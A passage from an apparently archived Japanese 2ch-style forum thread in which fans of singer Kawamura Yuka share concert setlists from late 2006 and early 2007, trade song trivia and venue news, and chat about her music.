トリオは選曲変えてくるとは思うけど、セットリストは日曜の夜にあげます。


136 :名無しの歌姫:2006/12/22(金) 22:37:08 ID:2Y+s60/Z
選曲がおそろしく豪華だった。
冬らしい選曲だったけどクリスマスらしくはなかったなw
トリオは選曲変えてくるとは思うけど、セットリストは日曜の夜にあげます。


137 :名無しの歌姫:2006/12/23(土) 00:41:16 ID:vVJ6FxYd
>>131
当たって種
しかし1曲目が始まる、あの最初に何を演奏するのか会場中がドキドキする中、
遅れてきた女のヒールの音の目立つ事・・・空気嫁ゴルァ!
でも「元気でなんて言わないでね」聴いたから満足www

138 :ヒマワリ:2006/12/23(土) 23:31:28 ID:56krQriG
北海道住んでた頃は結花たんのライブ10回以上行ってたのに今は新潟県住みだからもう一年以上結花たん見てないから寂しい!結花たんお願い!新潟か長岡でライブやって!あと新潟のFM局で特集組んでほしい。

139 :名無しの歌姫:2006/12/24(日) 08:11:25 ID:NDjxHa9b
>>137
乙!
「元気で〜」今日行くからやってほしいな〜。

140 :名無しの歌姫:2006/12/25(月) 01:32:06 ID:Ckfm0d2q
ときめきのリズム
bound
遠い星と近くの君
明日は明日
恋はちから
それでも明日の歌が聞こえる
冬がきた
ワインレッドの心
ひみつのアッコちゃん(インスト)〜デビルマン(インスト)〜やつらの足音のバラード
きみのうた
アケボノ
Dearest
私だけが知ってる
バナナ
朝焼けのうた
夜空ノムコウ
home
荒野の果てに
oh my dear

141 :22日分:2006/12/25(月) 01:53:04 ID:7A2JfIgt
君の歌(藤木直人提供曲)
(藤岡正明提供曲)
明日は明日(Skoop On Somebody提供曲)
全身鏡
今年の恋
エンゲージ
「元気で」なんて言わないでね
星になるまで
夜空ノムコウ
(新曲)
(未発表曲)
(未発表曲?)
banana
朝焼けの歌

ときめきのリズム
home


142 :名無しの歌姫:2006/12/25(月) 01:54:38 ID:7A2JfIgt
>>140
うわ、恋はちから歌ったのか!?
めっちゃ行きたかったー。

143 :名無しの歌姫:2006/12/25(月) 03:15:49 ID:aalIaPY9
乙。そして>>141に補足
#2は「君でいっぱい」
夜空の次の曲は前日作った曲で年末一人で過ごすような感じだそうな
その次の曲は、サビが「あばよ/中島みゆき」と一緒な感じだったけど、結局わからず

>>140
アッコちゃんからの連続曲ワロスwww

144 :名無しの歌姫:2006/12/25(月) 13:37:33 ID:x5FbrCVF
氷川丸が今日までだそうな
BJWも今年までだし、結花たんのライブ会場がどんどんなくなっていく…

145 :名無しの歌姫:2006/12/25(月) 19:17:16 ID:+a77cqyv
「私だけが知ってる」って「わたしが知ってる」の間違い?

146 :名無しの歌姫:2006/12/25(月) 19:40:16 ID:Xto3ISKH
結花タソのライヴがなければ一生氷川丸には足を踏み入れないままだったろうな

147 :名無しの歌姫:2006/12/25(月) 20:16:32 ID:amLd4TkS
>>145
「わたしが知ってる」であってますw

148 :名無しの歌姫:2006/12/26(火) 02:46:46 ID:fCuKmqXr
>>145
ごめんね。あんま曲名とか分かんなくてさ。
Piano nightしか行ったことないからトリオは新鮮だったよ。

149 :名無しの歌姫:2006/12/28(木) 15:55:13 ID:P0obziRb








                      結花たんw

150 :名無しの歌姫:2006/12/28(木) 16:54:07 ID:gwmoxSoE
今回のツアー定着曲は夜空の向こうと朝焼けの歌かな

151 :名無しの歌姫:2006/12/28(木) 23:33:05 ID:FLL5TqYw
JR西日本なり東海は結花タソの「hometown」を今すぐCMソングにすべきだ
(ちゃんと『新幹線のホーム』って歌詞に入っているし・・・)

152 :名無しの歌姫:2007/01/01(月) 06:21:56 ID:/f40Xh82
結花タソ あけましておめでとう
もうすぐお誕生日ですね

153 :名無しの歌姫:2007/01/06(土) 01:30:40 ID:yyfuZDm2
今日初めてaround the PIANOに入っている春夏秋冬が、
泉谷しげるのモノであるということを知った21の冬

154 :名無しの歌姫:2007/01/06(土) 03:24:36 ID:O/eHd7uB
昭和は遠くなりにけりだな

155 :名無しの歌姫:2007/01/07(日) 08:52:08 ID:0iqIS4RM
>>135
ライブでやる歌謡曲カバーの面白さも?ということか。

ちなみに、 ワインレッドの心 をやったときのMCの内容が知りたい〜

156 :名無しの歌姫:2007/01/09(火) 23:18:56 ID:QbsQ+TZl
ttp://academy4.2ch.net/test/read.cgi/geo/1106921937/

157 :名無しの歌姫:2007/01/10(水) 00:38:19 ID:qNcO4830
>>156
くだらねー……けど不覚にも爆笑したw

158 :名無しの歌姫:2007/01/10(水) 15:53:56 ID:G6UAMd4D
>>155
135じゃないけど。
ワインレッド〜の時には特にこれといったMCはなかったかと。
最初に「リバーブ上げ気味で」とPAさんに。
saxでのスローなCareless Whisper(WHAM)のイントロから(間奏もコレ)歌い出しへ
最後にはこれまたsaxでのゴッドファーザー 愛のテーマでシメ。
saxを大フィーチャーしたアレンジでとてもエロかっこ良かったです。個人的にはこの曲が一番ツボでしたよ。

159 :名無しの歌姫:2007/01/12(金) 00:49:49 ID:G5wpaZ97
板が移転してたあげ

160 :名無しの歌姫:2007/01/12(金) 04:47:14 ID:BaR0Tj5/
川村版「やつらの足音のバラード」聴いてみたいな。あれいい曲なんだよね。

星が〜ひとつ〜、暗い宇宙にぃ〜生まれた〜♪

161 :名無しの歌姫:2007/01/15(月) 20:21:46 ID:wI7+Qbr0
ほしゅ

162 :名無しの歌姫:2007/01/16(火) 10:46:37 ID:Pn+jQZfD
歌スタではじめて川村結花を歌う人がいた。プロデュース業やってるんだから、
ハンターとして出ればよいのに。喋りで受けると思うのだが。


163 :名無しの歌姫:2007/01/17(水) 23:35:23 ID:V+SjyxTl
何歌ってたんだろ。

164 :名無しの歌姫:2007/01/18(木) 03:02:57 ID:lasVhDzs
>>163
公式によると夜空だね。まぁ、王道ですな。
通り名は「皿洗いする川村結花」らしい。

165 :名無しの歌姫:2007/01/18(木) 13:33:28 ID:uj5vM++G
東京芸大音楽学部作曲科出てるんだってね。 この人

166 :名無しの歌姫:2007/01/19(金) 04:10:21 ID:Mk+pX+N4
加えて早稲田ダンモですよw

167 :名無しの歌姫:2007/01/24(水) 02:11:17 ID:lHYkQHpf
ハッピーバースディ、結花さん

今年こそ、新作を 新作を もっと新作を・・・

168 :名無しの歌姫:2007/01/24(水) 18:40:51 ID:oxWl4nPn
えーっと、いくつになったんでしったっけ?

169 :名無しの歌姫:2007/01/24(水) 18:48:15 ID:Uj6R2A/K
40?

170 :名無しの歌姫:2007/01/24(水) 23:23:57 ID:mxEDHoTE
大台ですな・・・・。

171 :名無しの歌姫:2007/01/25(木) 20:26:52 ID:5CSoJNZq
辻結花とか

172 :名無しの歌姫:2007/01/29(月) 19:21:21 ID:zhw62BeO
年女でしょ

173 :名無しの歌姫:2007/01/29(月) 19:38:17 ID:mKfkFtWM
年女?48?

174 :名無しの歌姫:2007/02/02(金) 01:02:51 ID:A1YBEbpG
なかなか勇気のある(無礼千万?)なカバーするね
http://www.avexnet.or.jp/van/news/070124.html

175 :名無しの歌姫:2007/02/02(金) 02:52:07 ID:Y74lf/mQ
>>174
その面子の中に結花たんが入ってるのがスゴスwww
あえてhomeを持ってくるって選曲、好きなのかな?

176 :名無しの歌姫:2007/02/02(金) 18:06:13 ID:hIzMgTuT
オリジナルアルバム、まだかなぁ

177 :名無しの歌姫:2007/02/02(金) 20:10:11 ID:68EN2r5a
もう駄目かもしれない・・・・・

178 :名無しの歌姫:2007/02/03(土) 00:01:15 ID:YW8cH4Js
>>177
まだやれるかもしれない・・・・・

179 :名無しの歌姫:2007/02/03(土) 05:53:25 ID:sTqLIWuc
「朝焼けの歌」ってミュージシャンがオーディションに受かるまでのお話だと思っていたけれど、
その先もまだあったんだな・・・・
(『夕陽が沈む前に』とかつくらないかな?)

180 :名無しの歌姫:2007/02/03(土) 06:22:11 ID:vpwyl8Sn
俺は単純に、「夜空ノムコウ」と対にするつもりで作った曲だと思ってた

181 :名無しの歌姫:2007/02/03(土) 21:40:50 ID:NewqJPyK
10周年記念イベントとかないのかな

182 :名無しの歌姫:2007/02/04(日) 01:36:15 ID:FX1O01lp
氷川丸、来年春を目標に営業再開すると発表があったね。
またここでライブやってほしいな。

183 :名無しの歌姫:2007/02/09(金) 08:34:15 ID:mdQ5H38F
ほしゅ

184 :名無しの歌姫:2007/02/09(金) 22:33:27 ID:uZsFsZyr
浪人が決定した受験生に「朝焼けの歌」を聞かせるオフ会なんかあったら面白い

185 :名無しの歌姫:2007/02/10(土) 05:04:26 ID:BKbsxs7d
いつでも努力が足りないらしかった
すべては僕がいけないらしかった
それがどうやら 世の中らしかった
僕の座席は今夜も無かった〜♪
。・゚・(ノД`)・゚・。

186 :名無しの歌姫:2007/02/10(土) 21:04:28 ID:5J6+EWaK
「夢を続ける街」という予備校があってもいい

187 :名無しの歌姫:2007/02/10(土) 23:43:39 ID:yvuRavxB
>>186
いつかって言葉に裏切られ続けるんですね…

188 :名無しの歌姫:2007/02/11(日) 18:25:06 ID:Oq7T1uOo
さみしい日曜日の夕暮れ時。。。

189 :名無しの歌姫:2007/02/11(日) 19:16:48 ID:4CiMdk+q
金沢終了。持ち時間1時間。

1.夕日が沈んだら
2.HOME
3.夜空ノムコウ
4.全身鏡
5.?(北とぴあでも歌ってた)
6.星になるまで
7.バナナ
8.朝焼けの歌

アンコール(古内東子とともに)
1.さよなら(古内のデビューアルバム収録。川村がピアノで参加してたらしい)
2.言葉にできない(小田和正)

おまけ
3.卒業写真(荒井由美)


これから東京に帰ります。

190 :名無しの歌姫:2007/02/11(日) 19:22:33 ID:2CO3exue
×由美
○由実

191 :名無しの歌姫:2007/02/11(日) 21:10:57 ID:TK/nKssJ
>>189
遠征乙

192 :名無しの歌姫:2007/02/13(火) 02:23:24 ID:ZzvOxIVh
最近、書き込みがあんま無いね。

193 :名無しの歌姫:2007/02/13(火) 05:45:19 ID:31Vcx0xG
カキコするような話題も無いしね

194 :名無しの歌姫:2007/02/15(木) 00:35:51 ID:UqZimA5C
ほっしゅー

195 :名無しの歌姫:2007/02/17(土) 22:20:30 ID:/rHWQAUt
雨降りの土曜日age

196 :名無しの歌姫:2007/02/18(日) 00:50:44 ID:Ij7kz2D5
ageてないじゃんw

197 :名無しの歌姫:2007/02/18(日) 17:01:29 ID:NZIhoHUs
雨上がりの日曜日、失恋しますた。

失恋したら結花タソの曲が聴きたくなる。
結花タソの曲ナシには立ち直れない。
平原綾香のラジオ聞いてもな〜。

198 :名無しの歌姫:2007/02/18(日) 18:47:53 ID:WGz632aE
>>197
今週は、19時からイベントの生中継があるよ。

199 :名無しの歌姫:2007/02/18(日) 23:36:06 ID:olb14jLy
Z・O・Aの
「雨に濡れた髪の匂い ひんやりしていた唇♪」って
雨宿りをきっかけにラブホ(じゃないかもしれないけれど)に入って
二人がやっちゃったってこと?

きゃあ(*´д`;)…

200 :名無しの歌姫:2007/02/20(火) 10:42:46 ID:em0NAGp7
>197
a half note をじっくり聴くのもいいよね。
どっぷりハマった後、最後の1曲で救われます。

201 :197:2007/02/20(火) 12:31:17 ID:gRcjcOqq
>>>198

ありがとう。
日曜日はそんな素晴らしい事があったのですか。死んでて何もできませんでした。
結花タソはヒーリングビーナス終わってから星になったとばかり思ってた。


202 :197:2007/02/20(火) 12:37:00 ID:gRcjcOqq
>>>200

ありがとう。
a half note をじっくり聴きますた。最後の1曲は痛くて聴けませんでした。
代わりに「星になるまで」を聴きました。星になりたいと思う自分がさらに痛い_| ̄|○
もっと結花タソの曲を聴いてたち直りたいと思います。

203 :名無しの歌姫:2007/02/21(水) 00:05:39 ID:s10UAiK7
金沢のライブで「ここのピアノは捨てられそうになっていたのを拾われてここにいる」ってMCを聞いた時、
「『ピアノの墓場』をやるのか!?」って思ったのは俺だけか。

204 :名無しの歌姫:2007/02/23(金) 01:14:38 ID:DmR8X+lA
ライブでやったことあるんですか?

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)